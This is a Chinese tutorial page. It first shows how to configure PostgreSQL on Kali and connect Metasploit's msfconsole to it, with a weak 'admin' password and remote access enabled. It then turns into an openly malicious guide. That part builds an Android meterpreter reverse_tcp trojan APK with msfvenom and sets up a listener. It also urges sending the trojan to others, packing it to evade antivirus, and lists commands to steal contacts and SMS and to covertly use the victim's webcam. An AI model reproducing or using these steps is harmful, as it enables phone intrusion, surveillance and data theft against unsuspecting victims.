kali2.0 msfconsole怎么连接数据库

kali2.0 msfconsole怎么连接数据库,第1张

1、postgresql启动。

service postgresql start1

2、进入postgresql配置

sudo -u postgres psql

alter user postgres with password 'admin'12

注意1:’admin’ 这个是密码

注意2:分号!!!! 一定要带上分号””。

注意3:\q:退出数据库

3、修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)

root@kali:~# sudo passwd -d postgres

passwd:密码过期信息已更改。

root@kali:~# sudo -u postgres passwd

输入新的 UNIX 密码:

重新输入新的 UNIX 密码:

passwd:已成功更新密码123456

4、修改PostgresSQL数据库配置实现远程访问

root@kali:~# vi /etc/postgresql/9.4/main/postgresql.conf1

更改#listen_addresses = 'localhost'为listen_addresses = '*'

更改#password_encryption = on为password_encryption = on

root@kali:~# vi /etc/postgresql/9.4/main/pg_hba.conf1

在文档末尾加上以下内容

# to allow your client visiting postgresql server

host all all 0.0.0.0/32 md512

root@kali:~# service postgresql restart 1

注意1:”#”号,一定要把”#”删除掉。

注意2:在vi编辑模式下点击键盘字母a是进入编辑模式,编辑完成后点击“esc”退出编辑模式然后在最下方输入”:wq”保存并退出。

5、管理PostgreSQL用户和数据库

root@kali:~# psql -U postgres -h 127.0.0.1

用户 postgres 的口令:

psql (9.4.6)

SSL连接 (协议: TLSv1.2, 加密:ECDHE-RSA-AES256-GCM-SHA384,二进制位: 256, 压缩比: 关闭)

输入 "help" 来获取帮助信息.

postgres=# create user msf with password 'admin' nocreatedb

CREATE ROLE

postgres=# create database msf with owner=msf

CREATE DATABASE

postgres=# \q123456789101112

注意1:还是要注意分号!!!没有分号命令就无法执行。

注意2:注意复制的时候”“符号问题。

注意3:user后面是用户名,password后面是用户名对应的密码。

注意4:命令执行后有返回结果才是执行成功了。

6、msf配置连接

root@kali:~# msfconsole

msf >db_status

[*] postgresql selected, no connection

msf >db_connect msf:admin@127.0.0.1/msf

[*] Rebuilding the module cache in the background...

msf >db_status

[*] postgresql connected to msf

msf >12345678

db_connect -y /usr/share/metasploit-framework/config/database.yml1

在msf启动后连接数据库就好。

注意1:”msf:admin”这个是步骤5中的

“create user msf with password ‘admin’ nocreatedb”所建立的。

“127.0.0.1”是指本机。

“msf”这个是库名。

注意2:”[*] postgresql connected to msf”这个是说明以链接成功数据库。

7、配置自动连接

自动连接可以通过配置文件 /usr/share/metasploit-framework/config/database.yml 完成,内容可以通过复制database.yml.example并修改内容来完成设置。

root@kali:/usr/share/metasploit-framework/config#cp database.yml.example database.yml

root@kali:/usr/share/metasploit-framework/config#vi database.yml

root@kali:/usr/share/metasploit-framework/config#cat database.yml123

development: &pgsql

adapter: postgresql

database: msf

username: msf

password: admin

host: localhost

port: 5432

pool: 5

timeout: 5123456789

主要改database、password、host这三个值

重新执行msfconsole即可直接链接数据库

众所周知,msf是大家公认的神器!

现在我就来说说到底怎么用msf呢

有很多人说,他们不会安装msfconsole

教程:

http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool

安装了msfconsole之后,在termux输入:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk

其中

LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的

LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了

生成的木马在根目录的mu.apk(啰嗦)

那么接下来,我来教大家怎么监听吧

1.启动msfconsole(漫长):msfconsole

2.使用multi模块:use exploit/multi/handler

3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117

4.设置LPORT(一样的):set LPORT 5555

5.设置payload:set payload android/meterpreter/reverse_tcp

6.启动监听:exploit

最后将木马发给别人就行啦

很多人说一看就知道是木马了!

在这里我说一句,你不会加个壳嘛?

ok!当鱼上吊的时候,会反dshell

命令:

dump_contacts 导出电话

dump_sms 导出信息

webcam_list 列出摄像头

webcam_stream 开启摄像

webcam_snap 偷拍一张照片

webcam_chat 视频通话

ps 列出所有进程

activity_start 启动其它应用

check_root 检查是否root

send_sms 发送指定信息

全部手机进行,免root进行


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/7268496.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-03
下一篇 2023-04-03

发表评论

登录后才能评论

评论列表(0条)

保存